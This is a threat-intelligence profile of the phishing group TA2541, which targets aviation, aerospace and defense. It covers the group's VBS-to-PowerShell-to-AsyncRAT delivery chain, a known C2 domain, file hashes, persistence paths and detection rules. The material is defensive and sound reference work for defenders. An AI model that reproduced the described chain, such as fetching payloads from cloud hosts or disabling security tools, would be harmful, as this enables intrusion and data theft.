analyst@nohacky:~/threat-actors$
cat/threat-actors/ta2541
analyst@nohacky:~/ta2541.html
active threatprofile
typeAPT
threat_levelMedium
statusActive
originUnknown — assessed criminal or state-aligned
last_updated2026-03-27
T2
ta2541

TA2541

linked campaigns: MITRE G1018 Operation Layover (Cisco Talos) Proofpoint-tracked since 2017 Nigeria-linked (Cisco Talos assessment)

One of the most consistent and sector-specific APTs tracked by Proofpoint — active since at least 2017 with almost no change in tactics over eight years. TA2541 exclusively targets aviation, aerospace, transportation, defense, and manufacturing using only industry-specific lure themes (aircraft parts, fuel orders, charter requests, ambulatory flight information) rather than current events or news. Proofpoint assesses the actor as cybercriminal due to commodity malware use and high-volume spray campaigns, but Cisco Talos' Operation Layover investigation linked the infrastructure to Nigeria — and the sector focus and multi-year persistence of a narrowly defined target set suggests possible state-aligned intelligence collection objectives running alongside or behind the financial surface activity.

attributed originUnknown — Nigeria assessed (Cisco Talos, 73% passive DNS)
mitre idG1018
first observedJanuary 2017 (Proofpoint tracking start)
primary motivationCriminal / Espionage — Intelligence collection (assessed)
primary targetsAviation, Aerospace, Transportation, Defense, Manufacturing
campaign volumeHundreds–10,000 messages per campaign
tracked byProofpoint, Cisco Talos, Microsoft, Mandiant, Morphisec
current preferred ratAsyncRAT; vjw0rm (as of 2022 report)
defining characteristic8+ years of near-identical sector-specific TTPs

Overview

TA2541 is documented as one of the most stable and sector-consistent threat actors in the landscape. Proofpoint has tracked it continuously since 2017, and in nearly eight years of observation the group's fundamental approach has not changed: send bulk phishing emails using aviation and transportation lure themes to targets in aviation, aerospace, transportation, defense, and manufacturing, and deliver a commodity RAT payload. Campaigns consistently use English-language lures referencing industry-specific operational details — aircraft parts quotes, fuel orders, charter flight requests, ambulatory flight arrangements — rather than news events, current affairs, or trending topics. This specificity suggests a deliberate design to reach industry insiders who would find such requests credible, rather than a broad population sweep.

Proofpoint formally published its comprehensive TA2541 profile in February 2022, but noted that multiple other research organizations — Cisco Talos, Morphisec, Microsoft, and Mandiant — had independently observed and published on the same activity cluster since 2019 without connecting it all to a single actor. The Cisco Talos Operation Layover investigation (September 2021) was one of the most significant pre-Proofpoint disclosures, covering a two-year AsyncRAT campaign against the aviation industry and building a geographic profile of the threat actor through passive DNS telemetry that pointed approximately 73% of observed IPs to Nigeria. Proofpoint confirmed Operation Layover's activity overlaps with TA2541.

The question of TA2541's ultimate objective remains unresolved. Proofpoint classifies it as a cybercriminal actor due to its commodity malware use and high-volume broad targeting. However, the eight-year focus on aviation, aerospace, defense, and manufacturing — sectors with significant intelligence value for a range of state actors — combined with the Nigerian geographic assessment creates an ambiguous picture. The group may be financially motivated operators selling access or data, it may be operating with some degree of state alignment, or the Nigerian infrastructure footprint may reflect operational security layering rather than true operator location. Proofpoint explicitly states it does not know the actor's "ultimate goals and objectives once it achieves initial compromise."

What is analytically striking about TA2541 is the operational stability. Most threat actors — particularly those operating across eight-plus years — significantly evolve their TTPs in response to public disclosure, law enforcement attention, or defensive improvement. TA2541 has made minimal adaptations: it pivoted from macro-laden Word attachments to cloud-hosted VBS files (a delivery evolution shared across the entire threat landscape), it briefly adopted COVID-19 themes in spring 2020 before reverting within weeks, and it began using Discord URLs as an additional CDN in late 2021. The core model — industry-specific lure, cloud-hosted VBS, PowerShell execution, WMI security product discovery, AsyncRAT installation — has remained functionally identical.

Target Profile

TA2541's targeting is the narrowest of any actor in this hub by sector — five closely related verticals with recurring victims across all of them. The group does not target specific roles or functions within organizations; campaigns reach employees across all levels as long as they are at organizations in the relevant sectors.

  • Aviation Industry: The primary and most consistent target sector. Airlines, air cargo carriers, aircraft maintenance and repair organizations, aircraft parts suppliers, and aviation support services are all targeted. Lures mimic industry procurement requests, maintenance queries, and charter booking inquiries — the operational language of day-to-day aviation business. The ambulatory flight lure (requesting information on transporting a medical patient on a stretcher) is an example of the operational specificity that makes these emails credible to aviation personnel.
  • Aerospace and Defense: Defense contractors, aerospace manufacturers, and component suppliers are recurring targets. The defense sector is especially sensitive to long-term access campaigns because of the intelligence value of technical specifications, procurement data, and supply chain information.
  • Transportation and Logistics: Surface transportation operators, maritime logistics, cargo tracking companies, and freight forwarders fall within the target scope. TA2541 lures reference yacht charters, cargo shipments, and fuel orders — content credible to logistics and freight personnel.
  • Manufacturing: Industrial manufacturers, particularly those supplying components to aviation or defense programs, are included in the target profile. Supply chain proximity to aviation and defense targets makes manufacturers a logical secondary target for access and intelligence collection.
  • Geographic Scope: Campaigns impact hundreds of organizations globally. Recurring target regions are North America, Europe, and the Middle East — all significant aviation and defense hubs. Campaign messages are nearly always in English, consistent with targeting Anglophone aviation industry organizations and their international counterparts.

Tactics, Techniques & Procedures

TA2541's TTPs as documented by Proofpoint (February 2022), Cisco Talos (Operation Layover, September 2021), and Microsoft (May 2021). The attack chain has remained consistent across the full tracking period with the delivery mechanism as the primary variable.

mitre id technique description
T1566.001 / T1566.002 Spearphishing Attachment / Link Bulk phishing emails sent to hundreds–thousands of targets per campaign using exclusively aviation, aerospace, and transportation lure themes. Lures include: aircraft parts quote requests, fuel order inquiries, charter flight requests, ambulatory flight arrangements, yacht charter information, PPE cargo shipments (COVID-era brief pivot only), and generic cargo/freight queries. Emails are nearly always in English. The group does not use current events, news items, or trending topics — lures reference day-to-day operational aviation content. Campaigns contain hundreds to thousands of messages; it is rare to exceed 10,000 messages per campaign.
T1204.001 / T1204.002 Malicious Link / File Execution Early campaigns (2017–2020) delivered macro-laden Microsoft Word attachments directly in emails. From approximately 2020–2021, the group pivoted to Google Drive URLs in emails leading to obfuscated VBS files — a shift that moves the malicious payload off attachment scanners and onto trusted cloud infrastructure. Since late 2021, Discord URLs linking to compressed files (leading to AgentTesla or Imminent Monitor) have also been used. RAR attachments with embedded executables containing CDN URLs are observed less frequently as an alternative to cloud links.
T1059.001 / T1059.005 PowerShell / VBScript Execution Obfuscated VBS files hosted on Google Drive or OneDrive are the primary payload stage. When executed, PowerShell is invoked to pull a second-stage executable from a text file hosted on Pastetext, Sharetext, or GitHub. PowerShell is then injected into multiple Windows processes. VBS and PowerShell filenames mimic legitimate Windows system components (e.g., SystemFramework64Bits.vbs, RemoteFramework64.ps1) to blend with normal process activity. AsyncRAT is then downloaded and installed as the final payload.
T1082 / T1518.001 System Information Discovery / Security Software Discovery PowerShell queries Windows Management Instrumentation (WMI) to enumerate installed security products including antivirus and firewall software before the RAT payload is downloaded. This discovery phase allows the actor to adapt payload delivery or attempt to disable specific security products. System information including OS version, hardware profile, and network configuration is collected and available to operators via RAT C2 once the payload is installed.
T1562.001 Disable Security Software Following WMI security product discovery, PowerShell attempts to disable built-in Windows security protections before the RAT payload is downloaded. The specific methods vary by campaign and target environment, but the disablement step is consistent across the documented attack chain. This reduces the likelihood that AsyncRAT or secondary RAT payloads trigger detection on installation.
T1547.001 / T1053.005 Persistence — Registry Run Keys / Scheduled Tasks AsyncRAT persistence is typically established by adding a VBS file to the Windows Startup directory pointing to a PowerShell script. Additional persistence methods include registry AutoRun entries and scheduled task creation — the latter documented in November 2021 Imminent Monitor campaigns and vjw0rm/STRRAT campaigns. PowerShell and VBS filenames used for persistence mimic Windows system functionality to avoid detection during manual triage.
T1568.001 / T1583.001 Dynamic DNS C2 Infrastructure TA2541 uses dynamic DNS (DDNS) for C2 domains rather than registered domains, enabling rapid rotation and avoiding static blocklists. Consistent infrastructure patterns: C2 domains and payload staging URLs frequently contain the keywords "kimjoy," "h0pe," and "grace." Reply-to addresses in historic campaigns also contained "kimjoy." Consistent domain registrars used: Netdorm and No-IP DDNS. Consistent hosting providers: xTom GmbH and Danilenko, Artyom. Email sending infrastructure uses Virtual Private Servers. These repeating patterns across years of campaigns provide the core clustering evidence linking disparate campaigns to the same actor.
T1102 / T1583.006 Cloud Service Abuse — Google Drive / Discord Google Drive is the primary payload hosting platform, with OneDrive used occasionally. Traffic to Google Drive is typically permitted by enterprise firewalls and is HTTPS-encrypted, making malicious downloads indistinguishable from legitimate cloud storage access. Discord CDN URLs have been used since late 2021 to deliver compressed archives containing AgentTesla or Imminent Monitor. Pastetext, Sharetext, and GitHub are used for hosting the second-stage PowerShell executable as a text file, further leveraging trusted platforms to evade network-layer detection.

Known Campaigns

TA2541 runs continuous campaigns rather than discrete high-profile operations. The key documented clusters are organized around delivery method evolution and the landmark research publications that unified previously disparate reporting.

Initial Macro-Attachment Phase — Aviation and Transport Phishing 2017–2020

TA2541's founding operational phase used macro-laden Microsoft Word attachments delivered directly in bulk phishing emails. The 2017–2020 malware roster cycled through PowerShell Empire, NetWire, WSH RAT, Parallax, LuminosityLink, njRAT, RevengeRAT, and others — the group's documented use of over a dozen different RAT families during this period reflects annual toolset variation while the delivery mechanism and lure themes remained identical. Malwarebytes and independent researchers began observing some of this activity in 2019, but without connecting the campaigns to a unified actor. Lures throughout this phase used exclusively aviation, charter, cargo, and transportation vocabulary consistent with industry operational communications.

Operation Layover — AsyncRAT Aviation Campaign 2019–2021

Cisco Talos published Operation Layover in September 2021, documenting a two-year AsyncRAT campaign against the aviation industry. Cisco Talos used passive DNS telemetry to build a geographic profile of the threat actor, with approximately 73% of IPs associated with the key C2 domain (akconsult.linkpc.net) resolving to Nigerian addresses — the primary technical evidence supporting Nigeria as the operator's physical location. Operation Layover represented the most detailed pre-Proofpoint disclosure of TA2541's infrastructure and was confirmed by Proofpoint as overlapping with its TA2541 tracking cluster.

COVID-19 PPE / Cargo Theme Pivot Spring 2020

Like many threat actors in spring 2020, TA2541 briefly adopted COVID-19 lures — in its case, requests for quotes on personal protective equipment (PPE) cargo shipments and COVID-19 testing kit cargo. This represents the only documented instance of TA2541 adapting to an external news event in its entire tracked history. The pivot lasted only weeks before the group returned to its standard aviation and transport lures. The rapid reversion is notable: it suggests the operators had very low motivation to maintain COVID-19 framing and were either most comfortable with aviation-sector targeting or had specific operational reasons to remain within that vertical.

Microsoft Disclosure — RevengeRAT / AsyncRAT Campaign May 2021

Microsoft published research in May 2021 documenting a cyberespionage campaign against aviation targets delivering RevengeRAT or AsyncRAT. This campaign was later confirmed by Proofpoint to overlap with TA2541's activity cluster. Microsoft's reporting contributed to the multi-organization documentation that Proofpoint synthesized into the February 2022 comprehensive TA2541 profile — one of the clearest examples in recent years of independent research firms tracking the same actor without initially recognizing the common origin.

Google Drive VBS / Discord CDN Phase — AsyncRAT Primary 2021–Present

The current operational phase uses Google Drive URLs as the primary payload delivery mechanism, leading to obfuscated VBS files that chain through PowerShell and Pastetext/GitHub to download AsyncRAT. In late 2021, TA2541 added Discord URLs to the delivery mix, leading to compressed files delivering AgentTesla or Imminent Monitor as alternative payloads. VBS file names reference aviation themes consistent with the overall lure strategy (e.g., "Aircrafts PN#_ALT PN#_Desc_&_Qty Details.vbs"). Proofpoint assessed with high confidence in 2022 that this TTP pattern would continue with minimal change — a prediction that has proven accurate based on subsequent campaign observations through the tracking period.

Tools & Malware

TA2541 uses exclusively commodity and open-source malware — no custom tools. The RAT roster has cycled annually while the delivery mechanism and lure structure remained constant. AsyncRAT and vjw0rm are the current preference as of the Proofpoint 2022 report.

  • AsyncRAT (primary, current): An open-source C# remote access trojan widely used across the threat landscape. Provides remote system control, keylogging, file access, process management, and screen capture. AsyncRAT is TA2541's current preferred final payload, consistently dropped via the VBS/PowerShell chain since at least 2020. VBS persistence files in the Startup directory point to a PowerShell script that loads AsyncRAT on every boot.
  • vjw0rm: A JavaScript-based worm used as both a persistence mechanism and a RAT loader in documented TA2541 campaigns. Creates scheduled tasks and registry entries for persistence alongside AsyncRAT. Proofpoint specifically identified vjw0rm as one of two primary tools the group would continue using in future campaigns.
  • AgentTesla: An information stealer and RAT distributed via Discord CDN URLs. Primarily used for credential harvesting from browsers, email clients, and FTP applications. Delivered as a compressed file via Discord links — the less common of TA2541's two Discord-based delivery paths.
  • Imminent Monitor: A commercial RAT used in TA2541 campaigns beginning approximately November 2021 — when Proofpoint observed both scheduled task and registry persistence methods being used for the first time. Delivered via Discord CDN compressed archives.
  • NetWire / WSH RAT / Parallax / RevengeRAT: Commercial and open-source RATs used in various TA2541 campaigns across the tracking period, alongside or in rotation with AsyncRAT. The group typically uses one or a handful of RATs per campaign but distributed over 10 different RAT families simultaneously in 2020 — the broadest single-year malware diversity observed in the tracking period.
  • LuminosityLink / njRAT / STRRAT: Additional commodity RATs observed in TA2541 campaigns across 2017–2022. LuminosityLink is a discontinued but still widely distributed RAT; njRAT is a freely available Arabic-origin RAT popular across Middle East and African threat actor ecosystems. STRRAT is a Java-based RAT that uses scheduled task persistence alongside vjw0rm.
  • Crypters (payload obfuscation): MITRE ATT&CK G1018 notes that TA2541 uses crypters to obfuscate commodity RAT payloads, reducing static detection rates. The specific crypters vary by campaign. This obfuscation is applied on top of the VBS obfuscation layer already present in the delivery chain, creating a multi-layer evasion approach despite the relatively unsophisticated base tooling.

Indicators of Compromise

Infrastructure and file-based indicators from Proofpoint's February 2022 report and Cisco Talos' Operation Layover disclosure. The infrastructure indicators are particularly durable — the "kimjoy," "h0pe," and "grace" keyword pattern and the No-IP/Netdorm registrar preference have been consistent across years of campaigns.

ioc staleness warning

TA2541 uses dynamic DNS for C2, enabling rapid infrastructure rotation. Specific domain and IP IOCs from the 2022 Proofpoint report should be treated as high-staleness. Prioritize keyword pattern detection ("kimjoy," "h0pe," "grace" in DNS and URLs), registrar fingerprinting (No-IP DDNS, Netdorm), and behavioral indicators (Google Drive VBS download chain) over static domain or IP blocklisting. The full IOC list including VBS hashes and Emerging Threats signatures is available in the Proofpoint original report.

indicators of compromise — technical identifiers
c2 keyword pattern "kimjoy" — appears in C2 domain names, reply-to addresses, and payload staging URLs across historic campaigns
c2 keyword pattern "h0pe" — appears in C2 domains and payload staging URLs
c2 keyword pattern "grace" — appears in C2 domains and payload staging URLs
domain registrars Netdorm; No-IP DDNS (linkpc.net, no-ip.biz, zapto.org subdomains) — consistent across campaigns
hosting providers xTom GmbH; Danilenko, Artyom — recurring TA2541 infrastructure hosts
c2 domain (layover) akconsult.linkpc.net — key Operation Layover C2 domain; ~73% IPs resolving to Nigeria (Cisco Talos)
vbs hash (sha256) 67250d5e5cb42df505b278e53ae346e7573ba60a06c3daac7ec05f853100e61c — "Aircrafts PN#_ALT PN#_Desc_&_Qty Details.vbs" (Dec–Jan campaign)
persistence path %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemFramework64Bits.vbs
powershell script path %TEMP%\RemoteFramework64.ps1 (executed by startup VBS)
payload hosting platforms Google Drive; OneDrive; Discord CDN (discordapp.com); Pastetext; Sharetext; GitHub
email sending infra Virtual Private Servers (VPS) — multiple providers; bulk email volume 100s–10,000 per campaign
full ioc reference Proofpoint report (Feb 2022) — includes C2 domains, VBS SHA256 hashes, Emerging Threats signatures: proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

Mitigation & Defense

Defensive guidance for organizations in TA2541's target verticals — aviation, aerospace, transportation, defense contractors, and manufacturing companies with supply chain ties to those sectors.

  • Aviation-Themed Email Filtering: TA2541's lures are specifically themed to aviation, aircraft parts, fuel, charter, and cargo. Security email gateways should implement rules flagging emails from external senders referencing aircraft parts quotes, charter requests, fuel orders, and ambulatory flight arrangements — particularly when combined with attachment or cloud link delivery. Unlike most phishing campaigns, TA2541 does not mimic trending news, making keyword filtering more reliable since the aviation vocabulary is narrow and consistent over years.
  • Block or Alert on Google Drive and Discord File Downloads in Client Context: The primary payload delivery mechanism is a Google Drive URL leading to a VBS file. Endpoint policies should block VBS file execution when downloaded from browser or email client contexts — applications that legitimately download VBS files from Google Drive are essentially nonexistent in enterprise aviation environments. Similarly, alert on Discord CDN (cdn.discordapp.com) file downloads from endpoints that are not developer or gaming systems.
  • DNS Keyword Monitoring — "kimjoy," "h0pe," "grace": The three C2 domain keyword patterns that have persisted across years of TA2541 infrastructure are high-fidelity detection signals. Configure DNS monitoring and SIEM alerts for any DNS queries or outbound connections to subdomains containing "kimjoy," "h0pe," or "grace." These keywords appearing in a No-IP or Netdorm domain is a near-certain TA2541 indicator. Alert on No-IP DDNS resolution (*.no-ip.biz, *.linkpc.net, *.zapto.org) generally, as TA2541 consistently uses these providers.
  • PowerShell Execution from VBS / Office Process Trees: The TA2541 chain executes PowerShell from a VBS file. Monitor for PowerShell spawned from wscript.exe or cscript.exe process trees. PowerShell with -ExecutionPolicy RemoteSigned pulling executables from Pastetext, Sharetext, or GitHub in this context is a high-fidelity TA2541 detection pattern. Block PowerShell download from clipboard-hosting services (pastetext.net, sharetext.io) as a general control.
  • Startup Directory VBS Persistence Monitoring: AsyncRAT persistence adds VBS files to the Windows Startup directory with system-mimicking filenames. Monitor for new VBS file creation in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ from non-administrative processes. Any VBS file added to this path by a browser, email client, or PowerShell process should trigger an immediate alert.
  • WMI Security Product Enumeration Alerting: TA2541's PowerShell stage queries WMI for security products before disabling them. WMI queries targeting the AntiVirusProduct or FirewallProduct classes from PowerShell in non-administrative context are a pre-disablement indicator. Log and alert on WMI calls to security product classes from unexpected process parents.
  • AsyncRAT C2 Port Monitoring: AsyncRAT commonly uses ports 6606, 7707, and 8808 for C2 communication. Monitor for sustained outbound connections on these ports from endpoints, particularly following office productivity application activity. AsyncRAT C2 connections from aviation industry workstations on non-standard ports should be treated as high-priority incidents.
  • Employee Awareness for Aviation-Specific Lures: TA2541's lures are operationally convincing for aviation personnel because they mimic routine business communications. Train procurement, operations, and logistics staff to verify unsolicited quote requests and charter inquiries through official channels before opening attachments or clicking links, particularly for requests arriving from unknown external senders at personal or generic email addresses rather than verified industry contacts.
analyst note

TA2541's eight-year operational persistence without significant TTP evolution is analytically unusual and warrants attention beyond its technical sophistication level. The simplest explanation is that the TTPs continue to work — targets in aviation and defense continue to open aviation-themed emails from unknown senders, execute VBS files downloaded from Google Drive, and the commodity RAT payloads establish persistence without triggering detection. The group's classification as "cybercriminal" by Proofpoint and "unskilled" by some researchers may underestimate the operational value of a persistent, low-noise long-term access campaign in aviation and defense organizations. A financially motivated actor optimizing for RAT deployment volume typically pivots to higher-return targets or techniques when ROI declines. TA2541's continued exclusive focus on the same five verticals for eight years — with a target set that includes defense contractors and aerospace manufacturers — suggests the access being generated has consistent downstream value, whether that value is realized through direct financial theft, access-as-a-service sales to third parties, or state-adjacent intelligence collection. Proofpoint's explicit acknowledgment that it does not know the actor's "ultimate goals and objectives once it achieves initial compromise" should be treated as an unresolved question with potential national security implications for defense-sector organizations that receive TA2541 campaigns.

Sources & Further Reading

— end of profile